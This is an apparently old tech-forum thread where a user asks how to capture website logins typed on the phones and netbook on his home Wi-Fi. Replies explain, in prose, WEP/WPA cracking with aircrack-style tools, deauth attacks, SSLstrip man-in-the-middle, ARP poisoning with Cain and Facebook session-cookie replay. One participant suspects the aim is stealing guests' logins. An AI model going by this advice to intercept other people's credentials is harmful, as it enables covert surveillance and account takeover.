Spying On My Own Wireless Network

[deadman_uk]

My Main Hardware:
D-Link DIR-615 Wireless Router (WPA2 encryption)
TalkTalk Broadband Modem (wireless turned off)
Windows 7 Desktop PC downstairs

Additional Wireless Devices:
Windows XP Netbook
Nokia n900 Smartphone
Samsung Genio Slide phone

The netbook and phones connect to the router wirelessly to receive an Internet connection. As a learning experience and a bit of fun, I wish to use my Windows 7 PC to spy on the activities of these wireless devices. E.g. I use the n900 to login to a website and I want the PC downstairs to capture my login details. Can this be done with WPA2 encryption? If not, if I drop the encryption down to WEP, how can I then achieve this? Since I am using my own network, on my own devices, this shouldn't be classed as illegal right?

Thanks

 

[ghost6303]

winpcap is a packet capture driver that will sniff any network you have access to. encryption doesnt matter if you already have access. there are tools to break WEP and WPA if you were outside the network trying to get in.

 

[Phantum]

The first process that comes to mind involves two steps;

Packet capture
Then
Decrypting of the captured packets for analysis

Although it may just be easier to install keystroke loggers on the machines in question and/or have some comprehensive logging going on at the access point or router.

 

[Vito_Corleone]

SPAN on the port connected to the WAP.

 

[deadman_uk]

winpcap is a packet capture driver that will sniff any network you have access to. encryption doesnt matter if you already have access. there are tools to break WEP and WPA if you were outside the network trying to get in.

Ok, lets assume I leave WPA2 enabled and I install Winpcap. What steps do I have to take to enable the main PC to view login details that have been entered on a mobile or netbook device?

Thanks

 

[AMD_Gamer]

SPAN on the port connected to the WAP.

this is a D-Link DIR-615, does it support that?

 

[deadman_uk]

The first process that comes to mind involves two steps;

Packet capture
Then
Decrypting of the captured packets for analysis

Although it may just be easier to install keystroke loggers on the machines in question and/or have some comprehensive logging going on at the access point or router.

Can you explain to me how this is achieved? What steps do I have to take? Installing a keylogger sort of defeats the purpose of this activity, plus because mobile phones are involved, this would likely be more difficult.

SPAN on the port connected to the WAP.

WAP is Wireless Access Point? You mean my router? What is SPAN?

 

[ghost6303]

if you are currently on the network, meaning you can see other computers and access the internet, then you can capture packets unencrypted and in plain text. this is why you use encryption in the first place, so the guy sitting in his car with a laptop cant do the same thing.

 

[AMD_Gamer]

if you are currently on the network, meaning you can see other computers and access the internet, then you can capture packets unencrypted and in plain text. this is why you use encryption in the first place, so the guy sitting in his car with a laptop cant do the same thing.

But this would be on a switched network. And encryption would only be to the access point.

 

[AMD_Gamer]

SPAN on the port connected to the WAP.

This would be the only way to do it.

 

[ghost6303]

my bad i read too fast and didnt catch you set up a second, separate, network.

so what you want to know is how to break wireless encryption? if you use a strong password and WPA2, you wont be able to. WEP is trivial, download a linux distro called backtrack 4 (is 4 still the latest?). comes preloaded with all the tools needed.

 

[deadman_uk]

my bad i read too fast and didnt catch you set up a second, separate, network.

so what you want to know is how to break wireless encryption? if you use a strong password and WPA2, you wont be able to. WEP is trivial, download a linux distro called backtrack 4 (is 4 still the latest?). comes preloaded with all the tools needed.

I do not have a 2nd separate network. I have a Talktalk modem connected to a D-Link DIR-615 wireless router. I am using WPA2 encryption and I have no intention (yet) to break into this encryption. As a member and admin of this network, I wish to go on a mobile device (and netbook), login to various websites and have my main PC capture the login details. Is this possible? If so, please can someone give me clear instructions if possible?

Once I can do this (something I consider basic), I may then ask or research more advanced things.

Thanks

 

[ghost6303]

i dont know if i am not understanding correctly, or you are being unclear....

so your computer (which you are trying to capture traffic from) and the netbook (which you are trying to capture the traffic of) are on the same network? the two devices can see each other?

 

[deadman_uk]

i dont know if i am not understanding correctly, or you are being unclear....

so your computer (which you are trying to capture traffic from) and the netbook (which you are trying to capture the traffic of) are on the same network? the two devices can see each other?

Main PC is on desk, plugged into a talktalk modem and a D-link wireless router. I then have 2 mobile devices and a netbook in other rooms of the house who use this same connection for internet activity. I have no network as such setup but all devices connect to the same d-link router wirelessly so I can have internet access throughout my home. I want the Main PC to capture logon details which the devices in the other rooms enter when they access various websites.

I am not sure if I can explain this any clearer.

 

[Phantum]

Main PC is on desk, plugged into a talktalk modem and a D-link wireless router. I then have 2 mobile devices and a netbook in other rooms of the house who use this same connection for internet activity. I have no network as such setup but all devices connect to the same d-link router wirelessly so I can have internet access throughout my home. I want the Main PC to capture logon details which the devices in the other rooms enter when they access various websites.

I am not sure if I can explain this any clearer.

Because you're on the same device in which all traffic transverses (the router), with a few programs and some patience you will be able to view all network activity flowing in and out of your home.

Again, all you need really is the right software. The easiest way, ...I think?, is to install sofware on your main machine that will turn your main machines' NIC into promiscuous mode so as to listen to all traffic happening on your network (assuming it's a truly basic home network) 192.168.1.1 - 192.168.1.255. Another way, would be to install software to capture packets of the wireless activity between the clients and the router/access point. This way would require two steps; the first would be to capture the packets (and enough of them to crack the method of encryption(WEP, WPA, WPA2)) and the second would be to then decrypt those packets to view the data.

I hate to say it but I'm a little out of practice in this avenue. I can't think of any programs off the top of my head to recommend for this venture but then again I also don't know if this is for legitimate purposes or for purposes of questionable legality either so...

 

[LZ1]

If you wanted to do this the way most attackers do you need a wireless card that can be set into monitor mode like the Alfa or other cards with the atheros chip set.

You then use airodump or similar products and capture packets for WEP you need a lot of IVs to crack it you can do airreplay and other tools to increase the amount with deauth and other attacks. If you use airodump make sure you set the channel so it doesn't jump around.

If you're trying to crack WPA you just need a handshake and then you can brute force the WPA key

You can get rainbow tables for common WPA passwords with common SSIDs WPA passwords are salted off the SSID.

Since this is your network and you don't want to waste time bruce forcing the key you can use airdecap with the password you already know to decrypt the capture file. You need a wifi card that you can put into monitor mode to do this attack.


Promicious mode won't let you capture packets on a wireless network your not connected to and if your connected then you know the password and this proves nothing.

There are a ton of resources online on how to do this along with videos.


The other issue you will probably run into is once you sniff wireless a lot of sites use SSL so you won't be able to see login details at this point you could associate with the AP once you have the key and run a MITM attack and use SSLstrip

 

[AMD_Gamer]

Because you're on the same device in which all traffic transverses (the router), with a few programs and some patience you will be able to view all network activity flowing in and out of your home.

Again, all you need really is the right software. The easiest way, ...I think?, is to install sofware on your main machine that will turn your main machines' NIC into promiscuous mode so as to listen to all traffic happening on your network (assuming it's a truly basic home network) 192.168.1.1 - 192.168.1.255. Another way, would be to install software to capture packets of the wireless activity between the clients and the router/access point. This way would require two steps; the first would be to capture the packets (and enough of them to crack the method of encryption(WEP, WPA, WPA2)) and the second would be to then decrypt those packets to view the data.

I hate to say it but I'm a little out of practice in this avenue. I can't think of any programs off the top of my head to recommend for this venture but then again I also don't know if this is for legitimate purposes or for purposes of questionable legality either so...

This is a switched network, just installing software on the main machine would not capture the wireless-wireless packets.

 

[AMD_Gamer]

guys the problem here is he won't be capturing all the packets with a switch!

 

[SticKx911]

google backtrack. if it cannot do it, it cannot be done. go to the remote-exploit forums and check it out.

wpa is much more difficult to crack at any reasonable distance assuming your key is not a simple dictionary word. wep can be cracked in just a few minutes with the right set of tools/routers in use.

 

[ShadowStriker]

Why don't you just install WireShark? Then capture all data from your wireless interface.

 

[Deleted member 176933]

Main PC is on desk, plugged into a talktalk modem and a D-link wireless router.

So your desktop is acting as the gateway?

Modem > desktop nic 1
Desktop nic 2 > router
router > wireless clients

 

[deadman_uk]

So your desktop is acting as the gateway?

Modem > desktop nic 1
Desktop nic 2 > router
router > wireless clients

It goes like this:

- Cat5e cable connected from ethernet port on back of desktop PC to the wireless router

- Cat5e cable connected from Talktalk modem to back of same wireless router

- Wireless router broadcasts signal throughout the house and my various wireless devices capture this signal providing them with Internet accesss.

I will look into the suggestions given here, thanks very much all. If someone can write a clear, step by step guide on how to do this in the mean time, this would save me some research time.

btw, I am not interested in cracking my WPA2 encryption as I already know the SSID and key.

 

[deadman_uk]

google backtrack. if it cannot do it, it cannot be done. go to the remote-exploit forums and check it out.

wpa is much more difficult to crack at any reasonable distance assuming your key is not a simple dictionary word. wep can be cracked in just a few minutes with the right set of tools/routers in use.

Is this what you mean? if so, it's an ISO and for Linux. Will this still work? It's 2GB download...

Why don't you just install WireShark? Then capture all data from your wireless interface.

I have installed this but am overwhelmed with what is going on when I capture. I really am new to this, hence why I wish to focus on my own network, knowing my SSID and key beforehand. Any tips? I will read the userguide if I can find it.

 

[SticKx911]

that is it. I've not played with version 4 much, but 3 was light weights and could run off a flash drive. It does have a learning curve, but it is the most powerful toolkit for network pen-test on all levels.

 

[deadman_uk]

that is it. I've not played with version 4 much, but 3 was light weights and could run off a flash drive. It does have a learning curve, but it is the most powerful toolkit for network pen-test on all levels.

Can it run off my main PC hard drive? Do you have any experience wih Wireshark? I am using it now and it looks interesting but I cannot achieve what my first aim is currently.

 

[BinarySynapse]

guys the problem here is he won't be capturing all the packets with a switch!

Exactly, The switch in his router only forwards packets to the port (WAN, 1, 2, 3, 4, or WLAN) they're destined for. WLAN is not going to see the traffic between port 1 and WAN; port 3 won't see the traffic between WLAN and port 2; and so on.

In short, he won't be able to do what he's wanting with the setup he currently has.

 

[ShadowStriker]

I have installed this but am overwhelmed with what is going on when I capture. I really am new to this, hence why I wish to focus on my own network, knowing my SSID and key beforehand. Any tips? I will read the userguide if I can find it.

At the top of the Wireshark window, there's a label "Filter:" and next to it a textbox. If you put

ip.proto == 6 || ip.proto == 17

it will give you all the UDP and TCP packets. You can also click Expression to see what else you can do for expressions. What the expression means is :
If (IP Protocol == UDP OR IP Protocol == TCP) then show those packets

If you're already on the network (since you said its your own) you won't have to decrypt, I believe.

 

[AMD_Gamer]

Exactly, The switch in his router only forwards packets to the port (WAN, 1, 2, 3, 4, or WLAN) they're destined for. WLAN is not going to see the traffic between port 1 and WAN; port 3 won't see the traffic between WLAN and port 2; and so on.

In short, he won't be able to do what he's wanting with the setup he currently has.

Thank you. finally somebody said it, I was just too lazy to explain. Also that is pretty silly that people are suggesting he use backtrack when he obviously does not know much about the basics.

 

[deadman_uk]

Exactly, The switch in his router only forwards packets to the port (WAN, 1, 2, 3, 4, or WLAN) they're destined for. WLAN is not going to see the traffic between port 1 and WAN; port 3 won't see the traffic between WLAN and port 2; and so on.

In short, he won't be able to do what he's wanting with the setup he currently has.

The talktalk modem plugs into the INTERNET port of my wireless router. The PC connects to the LAN 2 port of my wireless router. No other cables are plugged in. I am probably wrong here but it looks like you think I am using mulitple ports on my router.

At the top of the Wireshark window, there's a label "Filter:" and next to it a textbox. If you put

ip.proto == 6 || ip.proto == 17

it will give you all the UDP and TCP packets. You can also click Expression to see what else you can do for expressions. What the expression means is :
If (IP Protocol == UDP OR IP Protocol == TCP) then show those packets

If you're already on the network (since you said its your own) you won't have to decrypt, I believe.

I was previously using the HTTP filter but ip.proto == 6 || ip.proto == 17 is probably better now. I started capturing and connected to my wireless internet connection on my Nokia n900, I noticed in the capture details, it said Nokia. I then tried logging into various websites but I couldn't get much to show, certainly no logon details.

I even tried capturing from the PC Wireshark is installed on and I logged into Facebook and Youtube, yet I see no HTTP POST / in the protocol and info tabs, only GET /. It is my understanding that logon details would be stored when a description in the info tab says POST /. Am I correct? If so, I do not know why this isn't working, I do not see any POST / enteries.

 

[BinarySynapse]

The talktalk modem plugs into the INTERNET port of my wireless router. The PC connects to the LAN 2 port of my wireless router. No other cables are plugged in. I am probably wrong here but it looks like you think I am using mulitple ports on my router.

I was speaking in general. In your case WAN is the Internet port, WLAN is the internal port that the wireless radio is connected to.

You will not see any traffic that's not going directly to your desktop computer. The router has a built-in switch that looks that the destination IP of each packet it receives and forwards it only to the port that associated with that IP. So if your wireless devices are sending information to the internet, the only devices that are going to see that information is the router itself, and your modem. You desktop PC will not see it.

 

[deadman_uk]

I was speaking in general. In your case WAN is the Internet port, WLAN is the internal port that the wireless radio is connected to.

You will not see any traffic that's not going directly to your desktop computer. The router has a built-in switch that looks that the destination IP of each packet it receives and forwards it only to the port that associated with that IP. So if your wireless devices are sending information to the internet, the only devices that are going to see that information is the router itself, and your modem. You desktop PC will not see it.

So there is no software available that will allow me to use my desktop PC to see information sent and received from wireless devices? Can I view this information from the router/modem itself?

 

[BinarySynapse]

So there is no software available that will allow me to use my desktop PC to see information sent and received from wireless devices? Can I view this information from the router/modem itself?

Not unless your desktop PC has a wireless adapter, and even then I'm not sure it would do you any good to capture the packets for other wireless devices since they'd all be encrypted.

You could set your desktop as a gateway if it had two network interfaces. That would put it in the middle of the router and the modem so that you could capture everything going between the two.

 

[ShadowStriker]

I was previously using the HTTP filter but ip.proto == 6 || ip.proto == 17 is probably better now. I started capturing and connected to my wireless internet connection on my Nokia n900, I noticed in the capture details, it said Nokia. I then tried logging into various websites but I couldn't get much to show, certainly no logon details.

I even tried capturing from the PC Wireshark is installed on and I logged into Facebook and Youtube, yet I see no HTTP POST / in the protocol and info tabs, only GET /. It is my understanding that logon details would be stored when a description in the info tab says POST /. Am I correct? If so, I do not know why this isn't working, I do not see any POST / enteries.

For Facebook, you'll see that on the next line it says its an SSL connection and shows one encrypted data. Depending on how their TLS works you don't actually need to send your actual password, but your passkey created from the TLS encryption to validate your password (since they can decrypt server-side). There's a packet that pops up in Wireshark with "Application Data" in the Info field that will contain the encrypted data that is sent for validation. (on my Wireshark capture, there are 10 lines of 4 TCP packets, and 6 TLSv1 packets). When you get to the packet that says "GET /home.php? HTTP/1.1", it means that the validation is completed, and if you examine that packet, under Hypertext Transfer Protocol>>"GET /home.php? HTTP/1.1\r\n" there's a field that contains the cookie that lets you stay logged into Facebook. I haven't tried it, but I'm pretty sure if you can replicate that cookie file with the unique identifies that you've captured, you'll be able to refresh Facebook and be logged in.

If you look look at the data when you log into the HardForums, you'll see a line similar to the one below

16    8.419276    192.168.103.11    75.126.99.220    HTTP    POST /login.php?do=login HTTP/1.1  (application/x-www-form-urlencoded)    1850

and in the middle box there'll be a section that shows the below

Line-based text data: application/x-www-form-urlencoded
[truncated] vb_login_username=ShadowStriker&vb_login_password=&s=&securitytoken=ABC123&do=login&vb_login_md5password=ABC123&vb_login_md5password_utf=ABC123

I took out the MD5 keys and passwords and replaced them with ABC123, obviously.

 

[deadman_uk]

Not unless your desktop PC has a wireless adapter, and even then I'm not sure it would do you any good to capture the packets for other wireless devices since they'd all be encrypted.

You could set your desktop as a gateway if it had two network interfaces. That would put it in the middle of the router and the modem so that you could capture everything going between the two.

I heard you can use ARP poison using Cain that makes the computers on the LAN think YOUR pc is the router. Any information on this?

ShadowStriker, thanks for your informative post, I will try and digest what you just said shortly and see what I can do.

 

[ShadowStriker]

Personally, I like OmniPeek better than Wireshark, but they both are pretty useful. I find OmniPeek easier to read.

 

[deadman_uk]

For Facebook, you'll see that on the next line it says its an SSL connection and shows one encrypted data. Depending on how their TLS works you don't actually need to send your actual password, but your passkey created from the TLS encryption to validate your password (since they can decrypt server-side). There's a packet that pops up in Wireshark with "Application Data" in the Info field that will contain the encrypted data that is sent for validation. (on my Wireshark capture, there are 10 lines of 4 TCP packets, and 6 TLSv1 packets). When you get to the packet that says "GET /home.php? HTTP/1.1", it means that the validation is completed, and if you examine that packet, under Hypertext Transfer Protocol>>"GET /home.php? HTTP/1.1\r\n" there's a field that contains the cookie that lets you stay logged into Facebook. I haven't tried it, but I'm pretty sure if you can replicate that cookie file with the unique identifies that you've captured, you'll be able to refresh Facebook and be logged in.

If you look look at the data when you log into the HardForums, you'll see a line similar to the one below

16    8.419276    192.168.103.11    75.126.99.220    HTTP    POST /login.php?do=login HTTP/1.1  (application/x-www-form-urlencoded)    1850

and in the middle box there'll be a section that shows the below

Line-based text data: application/x-www-form-urlencoded
[truncated] vb_login_username=ShadowStriker&vb_login_password=&s=&securitytoken=ABC123&do=login&vb_login_md5password=ABC123&vb_login_md5password_utf=ABC123

I took out the MD5 keys and passwords and replaced them with ABC123, obviously.

Ok, since you mentioned Facebook in your example, let's focus on this for what I wish to do first. For the moment, I entered my Facebook login details, started to capture in Wireshark, hit the login button in Facebook and then immediately stopped capturing the moment I logged in. This is what it shows and it is similar to what you said:

http://img204.imageshack.us/img204/5861/wireshark1.jpg

So the GET /home.php? HTTP/1.1 packet contains the logon information? When I right click mine and select "Follow TCP Stream" I don't see what you showed me. Unless the Hardforum example doesn't apply for Facebook?

 

[ShadowStriker]

The HardForums and Facebook don't log in the same way. The only information you'll be able to pull will be under the Secure Socket Layer section, in the middle of that picture.

If you click the packet that says "GET /home.php? HTTP/1.1" in the middle of your screen you should be able to see in one of the sections that says "cookie blah blah blah"

The cookie won't show password or usename though, just the validation "certificate".

 

[THOMO]

sounds like trying to capture other peoples details/logins/passwords when they login to their accounts with their netbooks/smartphones whilst at your house using your network.

Why anyone using a netbook/smartphone on their own network would need to capture their own login details to a downstairs pc eludes me, sounds very suspicious IMO.

 

[ShadowStriker]

sounds like trying to capture other peoples details/logins/passwords when they login to their accounts with their netbooks/smartphones whilst at your house using your network.

Why anyone using a netbook/smartphone on their own network would need to capture their own login details to a downstairs pc eludes me, sounds very suspicious IMO.

From what I'm gathering, he wants to test it out, so he'll know what to look for. And when you use a controlled variable, its easier to know what to look for.

 

[THOMO]

Yes that's entirely possible I suppose, maybe I'm just too paranoid